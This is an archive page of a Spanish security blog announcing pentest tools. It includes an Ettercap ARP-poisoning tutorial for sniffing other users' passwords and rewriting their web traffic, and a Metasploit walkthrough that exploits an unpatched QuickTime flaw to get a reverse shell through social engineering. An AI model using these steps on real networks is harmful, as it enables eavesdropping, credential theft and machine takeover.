Mostrando entradas con la etiqueta Programas Windows. Mostrar todas las entradas
Mostrando entradas con la etiqueta Programas Windows. Mostrar todas las entradas

16/4/2012

[Forensic FOCA] Análisis Forense de Metadatos

Ya muchos conocemos la FOCA, herramienta por excelencia de footprinting y fingerprinting (Reconocimiento) que funciona buscando en Google y Bing los archivos de una web con extensión: *.doc,*.ppt,*.pps, *.xls, *.docx, *.pptx, *.ppsx, *.xlsx. *.sxw, *.sxc, *.sxi, *.odt, *.ods, *.odg, *.odp, *.pdf, *.wpd, *.svg, *.svgz, *.indd, *.rdp, *ica  , luego los descarga para buscar todo tipo de metadatos que existan (usuarios, impresoras, software usado, sistema operativo, servidores, etc...) en estos archivos (que por lo general son muchos), y con eso hacer un excelente mapeo del sistema.

Ahora el equipo de Informática 64 ha sacado una nueva herramienta llamada Forensic FOCA que es una herramienta orientada para analistas forenses, que contando con la imagen o respaldo de un disco duro de un computador se puedan analizar todos los documentos ofimáticos que hayan en este, extraer los metadatos y generar una línea de tiempo con fecha de creación, fecha en el cual fueron editados, impresos, que usuario realizó dichas tareas; también en el análisis se especifica software encontrado, sistema operativos, carpetas, mails, impresoras, servers, etc... Mucha información de utilidad que expone datos sensibles y que nos sirve para un buen análisis del equipo.

5/4/2012

[xTSCrack] Herramienta de auditoría RDP (escritorio remoto)

Bueno, la verdad es que ya se ha hablado mucho de la vulneravilidad en el escritorio remoto de Windows (RDP) (MS12-020 - Critical) que en un principio se creía que se podía ejecutar código arbitrario en el equipo atacado, pero al final solo se podia generar un simple BSoD (pantallazo azul), por lo cual fue clasificado como DoS. Y de verdad a mi no me llama mucho la atención un DoS, así que como está tanto en boca el RPD (escritorio remoto) les traigo una herramienta bastante buena que es para auditarlo en vez de botarlo.

23/2/2012

[Nessus 5] Nueva versión de este excelente escáner de vulnerabilidades

Estuve de vacaciones, pero no quiero que se me pase poder postear sobre Nessus 5 que salió hace poco con muchas mejoras y con la calidad de siempre.

Nessus es un escáner de vulnerabilidades de la empresa estadounidense Tenable Network Security, sus funcionalidades son las de:

  • Descubrimiento activo de redes
  • Escaneo de vulnerabilidades distribuido
  • Política de auditoria

Permite la exportación de informes en varios formatos donde posteriormente pueden ser asociados con Metasploit y otras herramientas de pentest.

Nessus en su versión 5 ha renovado alguna de sus muchas funcionalidades y ha añadido numerosas mejoras y/o actualizaciones:

22/12/2011

[MySQL Password Auditor] Auditoría & Recuperación de Contraseñas MySQL


Desde SecurityXploded les traigo MysqlPasswordAuditor que es un programa gratuito de recuperación de contraseña de MySQL (uno de los software de bases de datos más potentes y utilizadas por la mayoría de las aplicaciones y servidores web).

MysqlPasswordAuditor ayuda a la recuperación de la contraseña de un servidor MySQL y puede ser usada para auditar bases de datos Mysql y descubrir contraseñas débiles.

MysqlPasswordAuditor es muy fácil de usar, con la simple diccionario, por fuerza bruta empieza a probar todas las contraseñas que estén en nuestro diccionario. Por defecto se incluye una lista de contraseñas de archivos pequeños, sin embargo pueden encontrar más diccionario con contraseñas aquí.

15/12/2011

[The Mole] Herramienta de Inyección SQL/SQLi Automatizada

Como regalo de navidad les traigo una de tantas herramientas para SQLi que existen, pero está me ha gustado bastante primero por que es de muy fácil uso y también por los métodos de petición que tiene.

The Mole es una herramienta de inyección SQL automatizada que mediante una URL vulnerable con su(s) respectivo(s) string(s) detectada y testeada en busca de vulnerabilidad SQLi, ya sea por método UNION o por consulta Booleana.

Características:
  • Soporta inyecciones a MySQL, SQL Server, PostgreSQL & Oracle.
  • Soporta linea de comandos. Diferente comando producen diferentes respuestas.
  • Auto-completación de los comandos, argumentos de comandos y los nombres de base de datos, tabla y las columnas.
  • Soporte pata filtros de consulta, para bypass IPS/IDS.
  • Explota inyecciones SQL a través de métodos GET y POST.
  • Desarrollada en python3.

27/10/2011

FOCA 3.0 FREE Listo para la Descarga!


Bueno, yo creo que ya muchos conocen la FOCA proyecto desarrollado por Informática 64, si no lo conocéis, me remito a copiar y pegar textual la descripción que está en la web.

FOCA es una herramienta para la realización de procesos de fingerprinting e information gathering en trabajos de auditoría web. La versión Free realiza búsqueda de servidores, dominios, URLs y documentos publicados, así como el descubrimiento de versiones de software en servidores y clientes. FOCA se hizo famosa por la extracción de metadatos en documentos públicos, pero hoy en día es mucho más que eso. Puedes obtener más información acerca de FOCA en los siguientes enlaces:

2/8/2011

Metasploit Framework 4.0.0

Todos conocemos MSF que es por excelencia la herramienta predilecta de muchos "hackers", ha salido la versión 4.0.0 de esta excelente herramienta... La nueva versión contiene 36 nuevas vulnerabilidades, 27 nuevos módulos de post-explotación y 12 módulos auxiliares, todo ello sumado a los que ya traía la versión 3.7.1 de mayo 2011. No quiero entrar en detalles mínimos, pero dejo un video donde se presenta algunas de las nuevas características de MSF 4.0.0 mediante la interfaz Armitage.

16/7/2011

PuTTY 0.61

Hace 4 días se publicó la versión 0.61 de PuTTY (que no se actualizaba desde 2007-04-29), sigue siendo beta, pero muy estable.

Para los que no sepan los que es PuTTY, enterence que es un cliente SSH, Telnet, rlogin, y TCP raw con licencia libre. Disponible originalmente sólo para Windows, ahora también está disponible en varias plataformas Unix, y se está desarrollando la versión para Mac OS clásico y Mac OS X.

Si eres un administrador de redes en Windows, esta herramienta es imprescindible, además de que es muy como ya que guarda los host a los cuales ya he accedido.

7/1/2011

[Tutorial] Advanced And Comprehensive Use Of Nmap (Español)

Bueno, hace algún tiempo que juh me ha enviado un texto de Nmap y que no he podido publicar por falta de tiempo y porque lo quería leer completo ;)

En el texto se explica muy claramente como usar Nmap desde 0 (omitiendo la instalación, pero eso lo hacen ustedes mismos xD).

29/11/2010

[Armitage] Administrador Gráfico de Cyber Ataques para Metasploit

Armitage es un Administrador Gráfico de Cyber Ataques para Metasploit que sirve para visualizar gráficamente tus objetivos, el mismo programa te recomienda que exploit usar, expone las opciones avanzadas del framework (esas que comúnmente se nos olvida o no sabemos), desde el mismo Armintage podemos iniciar un análisis con Nmap, e incluso se puede usar el módulo de Brute Force para sacar username/password.

16/11/2010

[SqlInjector v1.0.2] Herramienta para Blind SQL injection

SqlInjector es una aplicación para realizar Blind SQL injection. Actualmente es compatible con MS SQL Server. Utiliza inferencia basadas en el tiempo para determinar las condiciones verdaderas o falsas para extraer los datos. La característica clave es que utiliza un mecanismo de búsqueda binaria para reducir la búsqueda de espacio de direcciones, esto significa que puede obtener cada valor de carácter dentro de 7 a 8 solicitudes.

[PenTBox v1.4] Nueva versión de esta suite de herramientas de seguridad

PenTBox es una suite de herramientas de seguridad multiplataforma, libre (GNU/GPLv3) y escrita en Ruby. El proyecto ha ido evolucionando, se han incluido módulos, salieron más versiones beta y la primera versión final.

¡Hoy os presentamos la segunda versión final!

Entre las mejoras y novedades que incluye se encuentran las siguientes:

25/10/2010

[Metasploit 3.5] Ya salió la nueva versión de este magnífico Framework

Luego que se cumpla el primer aniversario de la adquisición del proyecto Metasploit por parte de Rapid7, se anunció el lanzamiento de la nueva versión del Metasploit Framework, 3.5.0, con 613 exploits y cientos de bugs corregidos, ofreciendo mayor estabilidad y agregando nuevas funcionalidades. Por ejemplo ahora Meterpreter también se encuentra disponible para Windows de 64 bits.

Esta nueva versión incluye mayor funcionalidad con la nueva GUI en JAVA Scriptjunkie, en reemplazo de la ya vieja msfgui. Desde esta nueva interfaz ahora se puede controlar Nessus, VMWare.

Se han ampliando la posibilidad de importación de bases de datos de Retina y de Netsparker y ahora además se puede exportar a XML con el mismo comando db_export de siempre.

Para más detalle consulten la lista de cambios de la versión 3.5.

Pero lo más importante, tal y como se prometió, Metasploit Framework seguirá siendo gratuito y todavía se encuentra disponible bajo la misma licencia BSD.

Instalación Metasploit
GUI Metasploit

Descarga:

framework-3.5.0.exe
233,456,857 bytes (223M)
Windows installer including Java, PostgreSQL, Console2.
[ PGP ] SHA1: 04ba0f4cfd0f19d196c7e0cff3ca50da25876d97
framework-3.5.0-linux-i686.run
42,254,784 bytes (42M)
Linux 32-bit installer including all dependencies.
[ PGP ] SHA1: c17badf0aaf209c6d6ea9069b97aecde4130e732
framework-3.5.0-mini-linux-i686.run
23,749,783 bytes (23M)
Miniature Linux 32-bit installer including all dependencies.
[ PGP ] SHA1: 17c07f29c5923ab81c10458a874d38aa3483fcf1
framework-3.5.0-linux-x86_64.run
61,889,801 bytes (60M)
Linux 64-bit installer including all dependencies.
[ PGP ] SHA1: 3695d05b29b16a928b766b6cf2b207dde39cfe98
framework-3.5.0.tar.bz2
42,254,784 bytes (41M)
Unix tar format for installing on all other operating systems.
[ PGP ] SHA1: 15e72afdfdc374f74a6eb07969174855b6d02361

Leer más en: Blog de Metasploit

6/10/2010

[Videos] Aprende A Programar En Python desde 0

Aquellos que quieran aprender a programar en Python que es uno de los lenguajes mas usados hoy en día y favorito de muchos hackers por ser un lenguaje de programación amigable.

En estos videos de enseña desde cero a programar en Python bajo un sistema operativo windows, son muy didácticos, muy entendibles (incluso para alguien que nunca a programado) y lo mejor de todo es que están en español, los videos que mostraré a continuación están realizados por juh:

Programando En Pyhton - 1 instalación de pyhton y py2exe


Programando en python - 2 Operadores simples


Eso son los 2 primeros videos, si quieren ver los demás pueden hacerlo vía el canal de Youtube (lo recomiendo por si siguen subiendo más videos) o desde estos links:

Programando en pyhton - [1] instalacion de pyhton y py2exe:
Programando en python - [2] Operadores simples
Programando en python - [3] Variables
Programando en python - [4] Módulos y Funciones
Programando en python - [5] Escribiendo y Guardando Nuestro Primer Programa + Compilar Binario
Programando en python - [6] Comillas y Variables
Programando en python - [7] Convirtiendo a variable cualquier carácter
Programando en pyhton - [8] Diferecia entre input y raw_input
Programando en pyhton - [9] Secuencia y listas
Programando en python - [10] Deslices en listas
Programando en pyhton - [11] Mas sobre listas y variables
Programando en pyhton - [12] Funciones en listas
Programando en python - [13] Deslices en listas 2
Programando en python - [14] Introducion a metodos
Programando en python - [15] Mas sobre metodos
Programando en python - [16] Tuplas

Canal de Youtube

[+] Salu2

30/9/2010

Manual básico Ettercap (entorno gráfico)

Esta es una guia básica sobre la utilización de ettercap. Este programa que nos permite sniffar el tráfico de red y obtener  así las  contraseñas escritas por otros usuarios de nuestra red, además también permite leer, por ejemplo, las conversaciones del messenger u otros programas de mensajería instantánea.

1 - Primero tenemos que descargar el ettercap, la ultima versión es la 0.7.3 y
esta disponible tanto para windows como para linux:

Windows:
http://sourceforge.net/projects/ettercap/files/unofficial binaries/windows/

Linux:
http://ettercap.sourceforge.net/download.php

o (en el caso de Ubuntu)
# apt-get install ettercap-gtk

2 - Lo instalamos.

Si tienes la versión para compilar de linux:
# ./configure
# make
# make install

A partir de ahora lo interesante:

3 - Arrancamos el ettercap (en caso de linux como root, ya que sino no nos permitira seleccionar la interfaz de red a utilizar).

4 - Pestaña Sniff>Unified Sniffing

5 - Seleccionamos la interfaz que esta conectada a la red que queremos sniffar,
despues le damos a "Aceptar".

6 - Pestaña Host>Scan for hosts.

En la parte de abajo de la pantalla aparecerá algo como " X hosts added to the hosts list..."
(X sera un numero correspondiente al numero de maquinas conectadas a la red).

7 - Pestaña Host>Host list.

Ahora aparecerán las IPs de las maquinas conectadas, hay que tener en cuenta que el router también aparece (No aparece nuestro PC).

8 - Seleccionamos la IP del ordenador a atacar y pulsamos "Add to Target 1", después el router "Add to Target 2".

Ahora ya tenemos los objetivos marcados, pero antes de dar el siguiente paso tenemos que tener en cuenta que vamos a utilizar una técnica llamada Man In The Middle (MITM) y lo que haremos sera que todos los paquetes que van dirigidos al PC atacado pasen por nosotros, con lo que si nosotros nos desconectamos sin detener el ataque MITM nuestra víctima se quedara sin conexión por un tiempo, mientras se reinician las tablas arp.

9 - Pestaña Mitm>ARP Poisoning. Ahora marcamos la pestaña "Sniff remote connections" y pulsamos "Aceptar".

10 - Pestaña Start>Start sniffing.

Con esto estaremos snifando el trafico de red.

11 - Pestaña  View>Connections. Aquí podemos ver todas las conexiones y hacemos doble click sobre alguna podemos ver los datos que contiene, entre ellos conversaciones del messenger, usuarios y contraseñas, etc.

Ahora es cuestión de paciencia.

Bueno un saludo a todos y espero que os sirva.

Respeto a los filtros:

Este filtro se utiliza para cambiar las imagenes de la maquina a la que le hayamos hecho el man in the middle.

Primero tenemos que obtener el script del filtro, para esto vamos a la siguiente pagina y copiamos el script.


El script es el siguiente:
############################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
############################################################################
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
      # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

Ahora modificamos la dirección de las imágenes por las que nosotros queramos, por ejemplo la de portalhacker.net, quedaría así:
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
replace("IMG SRC=", "img src=\"http://foro.portalhacker.net/Themes/miembro/images/smflogo.gif\" ");
msg("Filter Ran.\n");
}

Lo siguiente sera guardar el script con extension .filter, por ejemplo imagen.filter.

Una vez hecho esto abrimos una consola y vamos al directorio donde tenemos el imagen.filter. Una vez allí ponemos y se compilara el filtro:
etterfilter imagen.filter -o imagen.ef

Con esto nos generara el imagen.ef. Una vez creado lo copiaremos al directorio de ettercap
/usr/share/ettercap

Ahora arrancamos ettercap y realizamos el MITM. Durante el MITM vamos a la pestaña filters->load a filter.

Una vez aquí seleccionamos el archivo imagen.ef y pulsamos aceptar. Con esto ya estar el filtro aplicado y las imágenes que vea la victima serán sustituidas por las que nosotros queramos.

Autor: Aetsu

27/9/2010

SoftPerfect Network Scanner v5.0

SoftPerfect Network Scanner es un escaner gratuito multi-threaded IP, escáner de NetBIOS y SNMP con una interfaz moderna y muchas características avanzadas. Está dirigido a administradores de sistemas y usuarios en general interesados en la seguridad informática. Contiene ping a computadoras, escáneres para escuchar en puertos TCP / UDP y muestra qué tipos de recursos compartidos están en la red (incluidos los ocultos y de sistema).
 
Además, te permite montar carpetas compartidas como unidades de red, navegar por ellos utilizando el Explorador de Windows, filtrar la lista de resultados y mucho más. SoftPerfect Network Scanner también puede comprobar un puerto definido por el usuario e informar si se está abierto. También puede resolver nombres de host y la detección automática de un rango de IP local y externa. Soporta el apagado remoto y Wake-on-LAN.

Principales características:

  • Pings a Computadoras y muestra los activos.
  • Detecta el hardware de direcciones MAC, incluso a través de routers.
  • Detecta las carpetas compartidas y los permisos de escritura.
  • Detecta las direcciones IP internas y externas.
  • Analiza en busca de puertos tcp en escucha, algunos de los servicios UDP y SNMP.
  • Recupera usuarios registrados, configuraciones de cuentas de usuario, el tiempo de actividad, etc
  • Usted puede montar y explorar los recursos de red.
  • Puede lanzar aplicaciones externas de terceros.
  • Se pueden exportar resultados a HTML, XML, CSV y TXT
  • Soporta Wake-On-LAN, apagado remoto y el envío de mensajes de red.
  • Recupera potencialmente cualquier información a través de WMI.
  • Recupera la información de registro remoto, sistema de archivos y gestor de servicios.
  • Es absolutamente gratis, no requiere instalación y no contiene adware/spyware/malware.

Imágenes

Ventana de explorador de la red principal, con algunos resultados del análisis.




El escáner de red puede ser fácilmente configurado a las necesidades del usuario.





Descarga SoftPerfect Network Scanner v5.0
Latest version: 5.0 (Sep 27, 2010)
Plataformas soportadas: Windows 2000, XP, 2003, Vista, 2008, Seven
32-bit and 64-bit
Licencia: Freeware

Web Oficial: http://www.softperfect.com/

16/9/2010

[Security Software Downloader] todo lo que necesitas para mantener seguro tu equipo

Una de las primeras cosas que hacemos cuando adquirimos un equipo o instalamos uno desde cero y utilizamos Windows es instalar el antivirus. Pero además, muchas veces queremos instalar más programas de seguridad que nos ayuden a proteger nuestro equipo. Un programa contra espías o herramientas específicas contra el malware que nos ayuden a mejorar la seguridad del equipo. En este caso seguro que os gusta Security Software Downloader, todo lo que necesitas para mantener seguro tu equipo.


Se trata de una aplicación que nos permite el acceso directo a la descarga de un completo grupo de aplicaciones de seguridad que muchos consideramos indispensables para la seguridad de los sistemas Windows. Dispone de un amplio grupo de antivirus gratuitos, y los principales antivirus de pago del mercado, en sus versiones de prueba. Además disponemos de Firewall y otras utilidades de seguridad.

En la configuración de la herramienta de descarga podemos elegir nuestro sistema operativo. La aplicación está disponible para sistemas de 32 y 64 bits que también podemos configurar. Por defecto la aplicación está en automático, de forma que detectará de forma automática el sistema y la versión que utilizamos. Está disponible para Windows XP, Vista y 7. 

Una vez marcadas las aplicaciones que queremos descargarnos nos creará una carpeta en la que irá descargando cada una de ellas para que posteriormente podamos instalar las aplicaciones que hemos elegido. Una vez completadas las descargas nos ofrecerá abrir la carpeta de destino para comenzar con las instalaciones.


La gran ventaja de SSDownloader está en que podemos llevarlo en nuestra memoria USB de referencia y si tenemos que realizar instalaciones en equipo ajenos no tendremos que estar buscando por distintas páginas para descargar, sino que marcaremos las opciones que nos interesan, las descargaremos y a instalar.

Descarga Security Software Downloader

Fuente: http://www.genbeta.com/

11/9/2010

[Patriot NG] Monitorizar en tiempo real cambios en sistemas Windows

Patriot NG es una herramienta de tipo 'Host IDS' que permite monitorizar en tiempo real cambios en sistemas Windows.

Patriot monitoriza:
  • Claves del registro: Indicando si alguna key sensible (autorun, configuración Internet Explorer ...) es alterada
  • Ficheros en los directorios 'Startup'
  • Nuevos usuarios creados en el sistema
  • Nuevos servicios
  • Cambios en el fichero Host
  • Nuevos trabajos en el 'Task Scheduler' de Windows
  • Alteración de la integridad de Internet Explorer (Nuevos BHOs, cámbios en la configuración ..)
  • Monitorización de la tabla ARP del sistema (prevención de ataques MITM)
  • Nuevos Drivers cargados en el sistema
  • Nuevos recursos compartidos NetBios
  • Protección TCP/IP (Nuevos puertos abiertos, nuevas conexiones realizadas por procesos, detección de PortScans ...)
  • Monitorización de directorios críticos del sistema (Nuevos ejecutables, nuevas DLLs ...)
Alerta
Configuración
Tray
    Es una excelente herramienta para los analizadores de malware o los que quieren seguridad de verdad...

    Patriot NG está en desarrollo, aun le falta algunas cosas, pero promete mucho.

    Descarga  Patriot NG

    Web oficial: http://security-projects.com/

    4/9/2010

    [Joomla Scan] Scanner para encontrar la versión de Joomla y posibles vulnerabilidades

    Hace poco pepelux realizó un Scanner para revisar remotamente la versión de Joomla de alguna web y posibles vulnerabilidades para explotarlas con sus respectivos exploits.
    El método usado consiste en comprobar una serie de ficheros que varían de una versión a otra, así como otros que contienen el ID de la última revisión. En resumen, ralizando muchas verificaciones en varios ficheros se llega a acortar el margen entre versiones hasta dar con la exacta.
    Interesante aplicación que sin duda utilizaría si dentro de mis objetivos esta una web Joomla. Además que el autor asegura que se actualiza.
    El programa al arrancarse comprueba si hay nuevas versiones o actualizaciones de la base de datos, de manera que cada vez que suba un nuevo bug se actualizará sólo.









    Descarga de Joomla Scan v1.2

    Fuente y web del autor: http://blog.pepelux.org/

    También pepelux realizó una versión en perl de esta herramienta para los amantes de la consola o para los usuarios de GNU/Linux, también dispone con actualizaciones.






    Descarga de Joomla Scan v1.1 en perl

    Fuente: http://blog.pepelux.org/

    Explotando con Metasploit el 0-day en QuickTime

    Bueno... Este es un texto bastante interesante realizada por SeguridadApple donde nos enseña a sacarle provecho al 0-day descubierto hace poco en QuickTime con Metasploit.


    En la entrada de hoy, se va a presentar en modo prueba de concepto lo sencillo y eficaz que sería realizar un ataque aprovechándonos de dicha vulnerabilidad. Para realizar dicha función vamos a utilizar el framework metasploit en su versión 3.4.2, y la última versión de QuickTime a día de hoy (7.6.7).


    Una vez iniciado metasploit pasaremos a ejecutar los siguientes comandos:
    •  use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que vamos a utilizar)
    • set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
    • set SRVPORT 80 (Puerto local del servicio) 
    •  set URIPATH juegos (Uri del servicio)
    • set payload windows/shell/reverse_tcp (Payload que vamos a utilizar) 
    •  set LHOST 192.168.0.162 (IP donde se conectará la víctima) 
    •  set LPORT 5050 (Puerto local de escucha) 
    •   exploit (Ejecutamos el exploit)
    Acto seguido observaremos como metasploit nos monta el servicio en la uri y puerto indicado.


    Con esto ya tendremos montando nuestro servicio que explota la vulnerabilidad de QuickTime, ahora sólo faltará, mediante ingeniería social, conseguir que alguien se conecte a nuestro servidor.


    Una vez que esto ha sucedido metasploit nos informará de que se ha creado una nueva sesión con la nueva víctima, en este caso con IP y puerto: 192.168.0.143:1105.


    Ahora únicamente bastará con pasarnos a la sesión indicada mediante el siguiente comando:

    •  sessions -i 2
    De este modo se nos devolverá una shell reversa de la víctima, obteniendo control total de su máquina.


    Hasta el momento no existe parche para esta vulnerabilidad, por lo que se recomienda tener cuidado con el uso de QuickTime en Internet.

    Autor: SeguridadApple
    Fuente: http://www.seguridadapple.com/